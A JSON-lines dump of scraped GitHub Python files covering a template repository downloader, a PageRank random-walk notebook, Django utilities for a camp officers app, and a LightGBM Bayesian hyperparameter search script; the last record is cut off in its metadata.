+{"seq_id": "9334562209", "text": "import os\nimport zipfile\nimport requests\nfrom giturlparse import parse\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom shellfoundry.utilities.template_versions import TemplateVersions\nfrom shellfoundry.exceptions import VersionRequestException\n\n\nclass DownloadedRepoExtractor:\n def __init__(self):\n pass\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def extract_to_folder(self, repo_link, folder):\n pass\n\n\nclass ZipDownloadedRepoExtractor (DownloadedRepoExtractor):\n\n def extract_to_folder(self, repo_link, folder):\n with zipfile.ZipFile(repo_link, \"r\") as z:\n infos = z.infolist()\n z.extractall(folder)\n return [info.filename for info in infos]\n\n\nclass RepositoryDownloader:\n def __init__(self, repo_extractor=ZipDownloadedRepoExtractor()):\n self.repo_extractor = repo_extractor\n\n def download_template(self, target_dir, repo_address, branch=None):\n user, repo = self._parse_repo_url(repo_address)\n if not branch:\n branch = self._get_latest_branch((user, repo))\n download_url = self._join_url_all(\"https://api.github.com/repos\", [user, repo, 'zipball', branch])\n archive_path = ''\n try:\n archive_path = self._download_file(download_url, target_dir)\n\n repo_content = self.repo_extractor.extract_to_folder(archive_path, target_dir)\n\n # The first entry is always the root folder by git zipball convention\n root_dir = repo_content[0]\n\n return os.path.join(target_dir, root_dir)\n\n finally:\n if os.path.exists(archive_path):\n os.remove(archive_path)\n\n def _join_url_all(self, url, fragments):\n for frag in fragments:\n url = url + '/' + frag\n return url\n\n def _try_parse_git_url(self, url):\n if url.startswith('git@'):\n parsed_repo = parse(url)\n return True, parsed_repo.owner, parsed_repo.repo\n else:\n return False, None, None\n\n def _try_parse_http_url(self, url):\n if url.startswith('http'):\n fragments = url.split(\"/\")\n return True, fragments[-2], fragments[-1]\n else:\n return False, None, None\n\n def _parse_repo_url(self, url):\n success, user, repo = self._try_parse_git_url(url)\n if not success:\n success, user, repo = self._try_parse_http_url(url)\n\n return user, repo\n\n def _download_file(self, url, directory):\n local_filename = os.path.join(directory, url.split('/')[-1])\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n if r.status_code != requests.codes.ok:\n raise VersionRequestException('Failed to download zip file from {}'.format(url))\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n # f.flush() commented by recommendation from J.F.Sebastian\n return local_filename\n\n def _get_latest_branch(self, repo):\n return next(iter(TemplateVersions(*repo).get_versions_of_template()))\n", "repo_name": "menib/shellfoundry", "sub_path": "shellfoundry/utilities/repository_downloader.py", "file_name": "repository_downloader.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 17, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 19, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "giturlparse.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 87, "usage_type": "attribute"}, {"api_name": "shellfoundry.exceptions.VersionRequestException", "line_number": 88, "usage_type": "call"}, {"api_name": "shellfoundry.utilities.template_versions.TemplateVersions", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "34065835829", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\nimport operator\nG=nx.gnp_random_graph(10,0.5,directed=True) #.5 for edge creation prob.\nnx.draw(G,with_labels= True)\nplt.show()\nx=random.choice([i for i in range(G.number_of_nodes())]) #random source node\ndict_counter={}\nfor i in range(G.number_of_nodes()):\n dict_counter[i]=0\ndict_counter[x]=dict_counter[x]+1\nfor i in range(1000000): #we iterate here and wait for convergence of the points distributed\n list_n= list(G.neighbors(x))\n if(len(list_n)==0): #if x is sink(no neighbor)\n x=random.choice([i for i in range(G.number_of_nodes())])\n dict_counter[x]=dict_counter[x]+1\n else:\n x=random.choice(list_n)\n dict_counter[x]=dict_counter[x]+1\np=nx.pagerank(G)\nsorted_p= sorted(p.items(), key= operator.itemgetter(1))\nsorted_rw= sorted(dict_counter.items(), key= operator.itemgetter(1))\nprint(sorted_p)\nprint(sorted_rw)\n#we now match if the order comes in same as like 5-> 3-> ... otherwise increase the iterations\n\n\n# In[25]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\n\ndef add_edges():\n nodes= list(G.nodes())\n for s in nodes:\n for t in nodes:\n if s != t:\n r=random.random()\n if r<0.5:\n G.add_edge(s,t)\n return G\n\ndef ap(G):\n nodes= list(G.nodes())\n p=[]\n for each in nodes:\n p.append(100) #we assign point to each node \n return p\n\ndef distribute_points(G, points):\n nodes= list(G.nodes())\n new_points=[]\n for i in range(len(nodes)):\n new_points.append(0)\n for n in nodes:\n out=list(G.out_edges(n))\n if(len(out)==0):\n new_points=new_points[n]+points[n]\n else:\n share= points[n]/len(out)\n for(src, tgt) in out:\n new_points[tgt]= new_points[tgt]+share\n return new_points\n \ndef keep_distributing(points, G):\n while(1):\n new_points= distribute_points(G, points)\n print(new_points)\n points= new_points\n stop=input(\"press n to stop or any other key to continue\")\n if stop==\"n\":\n break\n else:\n continue\n return new_points\n \ndef rank_by_points(final_points):\n d={}\n for i in range(len(points)):\n d[i]= points[i]\n print(sorted(d.items(), key=lambda f:f[1]))\n \nG=nx.DiGraph() # a directed graph\nG.add_nodes_from([i for i in range(10)])\nG=add_edges()\nnx.draw(G,with_labels= True)\nplt.show()\n#assign points\npoints= ap(G)\n#distribute // convergence\nfinal_points= keep_distributing(points, G)\n#rank by points\nrank_by_points(final_points)\nprint(\"now compare it\")\nresult= nx.pagerank(G)\nprint(sorted(result.items(), key=lambda f:f[1]))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "hitiksaini/google-pagerank-algorithm", "sub_path": "How does Google Work.py", "file_name": "How does Google Work.py", "file_ext": "py", "file_size_in_byte": 2822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "networkx.gnp_random_graph", "line_number": 11, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "networkx.pagerank", "line_number": 27, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "networkx.pagerank", "line_number": 104, "usage_type": "call"}]}
+{"seq_id": "70235012328", "text": "\"\"\"\nUtility functions for officers app.\n\"\"\"\nfrom collections import defaultdict\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.models import Camp\nfrom cciw.utils.spreadsheet import ExcelSimpleBuilder\n\n\ndef camp_officer_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns complete list of officers for a camp\n \"\"\"\n return list(camp.officers.all().order_by(\"first_name\", \"last_name\", \"email\"))\n\n\ndef camp_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns list of officers who have not filled out an application form\n \"\"\"\n from cciw.officers.applications import applications_for_camp\n\n finished_apps_ids = applications_for_camp(camp).values_list(\"officer__id\", flat=True)\n return list(camp.officers.order_by(\"first_name\", \"last_name\", \"email\").exclude(id__in=finished_apps_ids))\n\n\ndef camp_serious_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns a list of officers who have serious problems in terms\n of submitted applications and references.\n \"\"\"\n # This looks at history - so we find officers who have been on camps before.\n # We also look across all the camps, to catch officers who might go from one\n # camp to the next, never submitting application forms or references. This\n # means the logic is slightly different than 'applications_for_camp', but as\n # this is meant as a warning system it doesn't matter that it doesn't match\n # the logic exactly.\n\n from cciw.cciwmain.models import Camp\n from cciw.officers.models import Application, DBSCheck, Invitation, Reference\n\n officers = [i.officer for i in camp.invitations.all()]\n # We need to allow applications/references for the current year to 'fix' a\n # track record. However, when displaying past problems, don't include the\n # current year.\n relevant_camps = list(Camp.objects.filter(year__lte=camp.start_date.year).order_by(\"-start_date\"))\n\n if len(relevant_camps) == 0:\n return []\n\n latest_camp = relevant_camps[0]\n\n all_invitations = list(\n Invitation.objects.filter(camp__in=relevant_camps, officer__in=officers).select_related(\"camp\", \"officer\")\n )\n all_apps = list(\n Application.objects.filter(finished=True, officer__in=officers, date_saved__lte=latest_camp.start_date)\n )\n\n all_received_refs = list(Reference.objects.select_related(\"referee\").filter(referee__application__in=all_apps))\n\n all_dbss = list(DBSCheck.objects.filter(officer__in=officers))\n\n received_ref_dict = defaultdict(list)\n for ref in all_received_refs:\n received_ref_dict[ref.referee.application_id].append(ref)\n\n # For each officer, we need to build a list of the years when they were on\n # camp but failed to submit an application form.\n\n # If they failed to submit two references, we also need to show them. (If\n # they didn't submit an application form then they will definitely have\n # missing references).\n\n # Dictionaries containing officers as key, and a list of camps as values:\n officer_apps_missing = defaultdict(list)\n officer_apps_present = defaultdict(list)\n officer_refs_missing = defaultdict(list)\n officer_refs_present = defaultdict(list)\n officer_dbss_missing = defaultdict(list)\n officer_dbss_present = defaultdict(list)\n officer_apps_last_good_year = {}\n officer_refs_last_good_year = {}\n officer_dbss_last_good_year = {}\n\n for c in relevant_camps:\n camp_officers = {i.officer for i in all_invitations if i.camp == c}\n camp_applications = [a for a in all_apps if a.could_be_for_camp(c)]\n officers_with_applications = {a.officer for a in camp_applications}\n officers_with_two_references = {a.officer for a in camp_applications if len(received_ref_dict[a.id]) >= 2}\n officers_with_dbss = {dbs.officer for dbs in all_dbss if dbs.could_be_for_camp(c)}\n\n for o in camp_officers:\n if o in officers_with_applications:\n officer_apps_present[o].append(c)\n else:\n officer_apps_missing[o].append(c)\n if o in officers_with_two_references:\n officer_refs_present[o].append(c)\n else:\n officer_refs_missing[o].append(c)\n if o in officers_with_dbss:\n officer_dbss_present[o].append(c)\n else:\n officer_dbss_missing[o].append(c)\n\n # We only care about missing applications if they are not\n # followed by submitted applications i.e. an officer fixes\n # their past record by submitting one application.\n\n def sort_camps(camps):\n camps.sort(key=lambda camp: camp.start_date)\n\n def sort_camps_reverse(camps):\n camps.sort(key=lambda camp: camp.start_date, reverse=True)\n\n def get_missing_and_present_lists(present_dict, missing_dict, last_good_year_dict):\n for officer, camps in present_dict.items():\n if camps:\n sort_camps(camps)\n last_camp_with_item = camps[-1]\n missing_camps = missing_dict[officer]\n new_missing_camps = [c for c in missing_camps if c.start_date > last_camp_with_item.start_date]\n missing_dict[officer] = new_missing_camps\n last_good_year_dict[officer] = last_camp_with_item.year\n\n for officer, camps in missing_dict.items():\n sort_camps_reverse(camps)\n\n # Don't show missing applications/references from current year\n for officer, camps in missing_dict.items():\n missing_dict[officer] = [c for c in camps if c.year < camp.year]\n\n get_missing_and_present_lists(officer_apps_present, officer_apps_missing, officer_apps_last_good_year)\n get_missing_and_present_lists(officer_refs_present, officer_refs_missing, officer_refs_last_good_year)\n get_missing_and_present_lists(officer_dbss_present, officer_dbss_missing, officer_dbss_last_good_year)\n\n tmp1 = [\n (o, officer_apps_missing[o], officer_refs_missing[o], officer_dbss_missing[o])\n for o in (\n set(officer_apps_missing.keys()) | set(officer_refs_missing.keys()) | set(officer_dbss_missing.keys())\n )\n ]\n # Remove empty items:\n tmp1 = [(o, a, r, c) for (o, a, r, c) in tmp1 if len(a) > 0 or len(r) > 0 or len(c) > 0]\n return [\n {\n \"officer\": o,\n \"missing_application_forms\": a,\n \"missing_references\": r,\n \"missing_dbss\": c,\n \"last_good_apps_year\": officer_apps_last_good_year.get(o),\n \"last_good_refs_year\": officer_refs_last_good_year.get(o),\n \"last_good_dbss_year\": officer_dbss_last_good_year.get(o),\n }\n for o, a, r, c in tmp1\n ]\n\n\ndef officer_data_to_spreadsheet(camp: Camp):\n spreadsheet = ExcelSimpleBuilder()\n # Import here to avoid import cycle\n from cciw.officers.applications import applications_for_camp\n\n # All the data we need:\n invites = (\n camp.invitations.all().select_related(\"officer\", \"role\").order_by(\"officer__first_name\", \"officer__last_name\")\n )\n apps = applications_for_camp(camp).prefetch_related(\"qualifications\")\n app_dict = {app.officer.id: app for app in apps}\n\n # Attributes we need\n app_attr_getter = lambda attr: lambda user, inv, app: getattr(app, attr) if app is not None else \"\"\n columns = [\n (\"First name\", lambda u, inv, app: u.first_name),\n (\"Last name\", lambda u, inv, app: u.last_name),\n (\"Email\", lambda u, inv, app: u.email),\n (\"Role\", lambda u, inv, app: inv.role.name if inv.role else \"\"),\n (\"Address\", app_attr_getter(\"address_firstline\")),\n (\"Town\", app_attr_getter(\"address_town\")),\n (\"County\", app_attr_getter(\"address_county\")),\n (\"Post code\", app_attr_getter(\"address_postcode\")),\n (\"Country\", app_attr_getter(\"address_country\")),\n (\"Tel\", app_attr_getter(\"address_tel\")),\n (\"Mobile\", app_attr_getter(\"address_mobile\")),\n (\"Birth date\", app_attr_getter(\"birth_date\")),\n ]\n\n header_row = [h for h, f in columns]\n\n def data_rows():\n for inv in invites:\n user = inv.officer\n app = app_dict.get(user.id)\n row = []\n for header, f in columns:\n row.append(f(user, inv, app))\n yield row\n\n spreadsheet.add_sheet_with_header_row(\"Officers\", header_row, data_rows())\n\n # Qualifications sheet\n spreadsheet.add_sheet_with_header_row(\n \"Qualifications\",\n [\"First name\", \"Last name\", \"Qualification\", \"Date issued\"],\n [\n [a.officer.first_name, a.officer.last_name, q.type.name, q.date_issued]\n for a in apps\n for q in a.qualifications.all()\n ],\n )\n\n spreadsheet.add_sheet_with_header_row(\n \"Dietary Requirements\",\n [\"First name\", \"Last name\", \"Requirements\"],\n [[a.officer.first_name, a.officer.last_name, a.dietary_requirements] for a in apps if a.dietary_requirements],\n )\n return spreadsheet\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 8987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.cciwmain.models.Camp", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.accounts.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 24, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "cciw.cciwmain.models.Camp.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 47, "usage_type": "name"}, {"api_name": "cciw.officers.models.Invitation.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "cciw.officers.models.Invitation.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Invitation", "line_number": 55, "usage_type": "name"}, {"api_name": "cciw.officers.models.Application.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "cciw.officers.models.Application.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "cciw.officers.models.Reference.objects.select_related", "line_number": 61, "usage_type": "call"}, {"api_name": "cciw.officers.models.Reference.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Reference", "line_number": 61, "usage_type": "name"}, {"api_name": "cciw.officers.models.DBSCheck.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "cciw.officers.models.DBSCheck.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.DBSCheck", "line_number": 63, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 161, "usage_type": "name"}, {"api_name": "cciw.utils.spreadsheet.ExcelSimpleBuilder", "line_number": 162, "usage_type": "call"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 170, "usage_type": "call"}]}
+{"seq_id": "28695557447", "text": "import numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\nimport lightgbm\r\nfrom sklearn.model_selection import StratifiedKFold, KFold\r\nfrom sklearn.metrics import f1_score, log_loss\r\nfrom bayes_opt import BayesianOptimization\r\n\"\"\" ====================== Function definitions ========================== \"\"\"\r\ndef BayesianSearch(clf, params):\r\n \"\"\"贝叶斯优化器\"\"\"\r\n # 迭代次数\r\n num_iter = 25\r\n init_points = 5\r\n # 创建一个贝叶斯优化对象,输入为自定义的模型评估函数与超参数的范围\r\n bayes = BayesianOptimization(clf, params)\r\n # 开始优化\r\n bayes.maximize(init_points=init_points, n_iter=num_iter)\r\n # 输出结果\r\n params = bayes.res['max']\r\n print(params['max_params'])\r\n \r\n return params\r\n\r\ndef GBM_evaluate(min_child_samples, min_child_weight, colsample_bytree, max_depth, subsample, reg_alpha, reg_lambda):\r\n \"\"\"自定义的模型评估函数\"\"\"\r\n\r\n # 模型固定的超参数\r\n param = {\r\n 'objective': 'regression',\r\n 'n_estimators': 275,\r\n 'metric': 'rmse',\r\n 'random_state': 2020}\r\n\r\n # 贝叶斯优化器生成的超参数\r\n param['min_child_weight'] = int(min_child_weight)\r\n param['colsample_bytree'] = float(colsample_bytree),\r\n param['max_depth'] = int(max_depth),\r\n param['subsample'] = float(subsample),\r\n param['reg_lambda'] = float(reg_lambda),\r\n param['reg_alpha'] = float(reg_alpha),\r\n param['min_child_samples'] = int(min_child_samples)\r\n\r\n # 5-flod 交叉检验,注意BayesianOptimization会向最大评估值的方向优化,因此对于回归任务需要取负数。\r\n # 这里的评估函数为neg_mean_squared_error,即负的MSE。\r\n val = cross_val_score(lgb.LGBMRegressor(**param),\r\n train_X, train_y ,scoring='neg_mean_squared_error', cv=5).mean()\r\n\r\n return val\r\n\r\ndef LGB(params, train_x, train_y):\r\n predictors = list(train_x.columns)\r\n train_x = train_x.values\r\n folds = 5\r\n seed = 202\r\n kf = StratifiedKFold(n_splits = folds, shuffle = True, random_state = seed)\r\n #kf = KFold(n_splits = folds, shuffle = True, random_state = seed)\r\n train = np.zeros((train_x.shape[0], 3))\r\n test = np.zeros((test_x.shape[0], 3))\r\n test_pre = np.zeros((folds, test_x.shape[0], 3))\r\n test_pre_all = np.zeros((folds, test_x.shape[0]))\r\n cv_scores = []\r\n f1_scores = []\r\n cv_rounds = []\r\n\r\n for i, (train_index, verify_index) in enumerate(kf.split(train_x, train_y)):\r\n tr_x = train_x[train_index]\r\n tr_y = train_y[train_index]\r\n ve_x = train_x[verify_index]\r\n ve_y = train_y[verify_index]\r\n\r\n train_matrix = lightgbm.Dataset(tr_x, label = tr_y)\r\n verify_matrix = lightgbm.Dataset(ve_x, label = ve_y)\r\n\r\n num_round = 6000\r\n early_stopping_rounds = 1000\r\n if verify_matrix:\r\n model = lightgbm.train(params, train_matrix, num_round, \r\n valid_sets = verify_matrix, \r\n verbose_eval = 50,\r\n early_stopping_rounds = early_stopping_rounds\r\n )\r\n verify_res = model.predict(ve_x, \r\n num_iteration = model.best_iteration\r\n )\r\n pred = model.predict(test_x, num_iteration = model.best_iteration)\r\n train[verify_index] = verify_res\r\n test_pre[i, :] = pred\r\n pre_y = np.argmax(verify_res, axis = 1)\r\n f1_list = f1_score(ve_y, pre_y, average = None)\r\n f1 = 0.2*f1_list[0] + 0.2*f1_list[1] + 0.6*f1_list[2]\r\n \r\n f1_scores.append(f1)\r\n test_pre_all[i, :] = np.argmax(pred, axis=1)\r\n\r\n f1_mean = np.mean(f1_scores)\r\n\r\n return f1_mean\r\n\r\ndef lgb_cv(feature_fraction,bagging_fraction,bagging_freq,learning_rate,num_leaves,min_child_weight,\r\n min_data_in_leaf,max_depth,min_split_gain,lambda_l2,num_iterations=5000):\r\n params = {\r\n 'boosting_type': 'gbdt',\r\n 'objective':'multiclass',\r\n 'metric':'multi_logloss',\r\n 'nthread': 6,'num_class':3,'verbose': -1,}\r\n\r\n params['min_child_weight'] = max(min_child_weight, 0)\r\n params[\"num_leaves\"] = int(round(num_leaves))\r\n params['lambda_l2'] = max(lambda_l2, 0)\r\n params['feature_fraction'] = max(min(feature_fraction, 1), 0)\r\n params['bagging_fraction'] = max(min(bagging_fraction, 1), 0)\r\n params['bagging_freq'] = int(round(bagging_freq))\r\n params['learning_rate'] = max(min(learning_rate, 1), 0)\r\n params[\"min_data_in_leaf\"] = int(round(min_data_in_leaf))\r\n params['max_depth'] = int(round(max_depth))\r\n params['min_split_gain'] = min_split_gain\r\n \r\n f1_result = LGB(params, train_x, train_y)\r\n return f1_result\r\n\r\n\"\"\" ======================= Load Training Data ======================= \"\"\"\r\npath = \"I:/TianChi/data/\" #存放数据的地址\r\nresult_path = \"I:/TianChi/data/\" #存放数据的地址\r\ntrain_json = pd.read_json(path + \"train_target.json\")\r\ntest_json = pd.read_json(path + \"test_target.json\")\r\n\r\ntrain_features = pd.read_csv(path + 'train_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntest_features = pd.read_csv(path + 'test_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntrain_df = pd.read_csv(path + 'train_feature3000_timecn_new.csv')\r\ntest_df = pd.read_csv(path + 'test_feature3000_timecn_new.csv')\r\nX = pd.read_csv(path + 'train_feature3000_fromJ.csv')\r\nX_test = pd.read_csv(path + 'test_feature3000_fromJ.csv')\r\n\r\n\"\"\" ====================== Variable Declaration ========================== \"\"\"\r\nselect_features = [\r\n \"rate1_mean\",\r\n \"rate1_std\",\r\n \"rate2_mean\",\r\n \"rate2_std\",\r\n \"number1_mean\",\r\n \"number1_std\",\r\n \"number2_mean\",\r\n \"number2_std\",\r\n 'square_mean', \r\n 'square_std',\r\n #'number_mean', \r\n #'number_std',\r\n 'car1_mean',\r\n 'car2_mean',\r\n 'truck1_mean',\r\n 'truck2_mean',\r\n #'bus1_mean',\r\n #'bus2_mean',\r\n #'motorbike1_mean',\r\n #'motorbike2_mean',\r\n #'bicycle1_mean',\r\n #'bicycle2_mean',\r\n \"gap_mean\",\r\n \"gap_std\",\r\n \"hour_mean\",\r\n \"minute_mean\",\r\n \"dayofweek_mean\",\r\n \"gap_time_today_mean\",\r\n \"gap_time_today_std\",\r\n '1','2','3',\r\n #\"im_diff_mean_mean\",\"im_diff_mean_std\",\"im_diff_std_mean\",\"im_diff_std_std\",\r\n ]\r\n\r\ntrain_features['number1'] = train_features['car1'] + train_features['truck1'] + train_features['bus1'] + train_features['motorbike1'] + train_features['bicycle1']\r\ntrain_features['number2'] = train_features['car2'] + train_features['truck2'] + train_features['bus2'] + train_features['motorbike2'] + train_features['bicycle2']\r\ntest_features['number1'] = test_features['car1'] + test_features['truck1'] + test_features['bus1'] + test_features['motorbike1'] + test_features['bicycle1']\r\ntest_features['number2'] = test_features['car2'] + test_features['truck2'] + test_features['bus2'] + test_features['motorbike2'] + test_features['bicycle2']\r\n\r\ntrain_features['square'] = train_features['rate1'] + train_features['rate2']\r\ntest_features['square'] = test_features['rate1'] + test_features['rate2']\r\ntrain_features['number'] = train_features['number1'] + train_features['number2']\r\ntest_features['number'] = test_features['number1'] + test_features['number2']\r\n\r\ntrain_features = train_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\n\r\ntest_features = test_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\ntrain_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n #'1','2','3','4','5','6','7','8','9','10','11',\r\n \"label\"]\r\ntest_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n \"label\"]\r\n'''\r\ntrain_df = get_data(train_json[:],\"amap_traffic_train_0712\")\r\ntest_df = get_data(test_json[:],\"amap_traffic_test_0712\")\r\ntest_df.to_csv(path_or_buf = path + 'test_feature_timecn_new.csv')\r\ntrain_df.to_csv(path_or_buf = path + 'train_feature_timecn_new.csv')\r\n'''\r\n\r\ntrain_features = pd.concat([train_features, train_df, X], axis = 1)\r\ntest_features = pd.concat([test_features, test_df, X_test], axis = 1)\r\n\r\ntrain_features[\"label\"] = train_features[\"label\"].apply(int)\r\ntest_features[\"label\"] = test_features[\"label\"].apply(int)\r\n\r\n\r\ntrain_x = train_features[select_features].copy()\r\ntrain_y = train_features[\"label\"]\r\ntest_x = test_features[select_features].copy()\r\n\r\n\"\"\" ====================== Random Search ========================== \"\"\"\r\nbounds = {\r\n 'min_child_weight': (1,10),\r\n 'num_leaves': (8, 150),\r\n 'lambda_l2': (0, 50),\r\n #'lambda_l1': (0, 50),\r\n 'feature_fraction': (0.2, 1),\r\n 'bagging_fraction': (0.2, 1),\r\n 'bagging_freq': (1, 100),\r\n 'learning_rate': (0.01, 1),\r\n 'min_data_in_leaf': (1,20),\r\n 'max_depth': (3, 30),\r\n 'min_split_gain': (0, 50),\r\n \r\n }\r\nlgb_bo = BayesianOptimization(lgb_cv, bounds, random_state = 1111)\r\n\r\nlgb_bo.maximize(init_points = 10, n_iter = 100)\r\nbest = lgb_bo.max\r\na = 0", "repo_name": "liuzexi256/GaodeMAP", "sub_path": "BayesOpt.py", "file_name": "BayesOpt.py", "file_ext": "py", "file_size_in_byte": 12329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bayes_opt.BayesianOptimization", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 71, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "lightgbm.train", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": 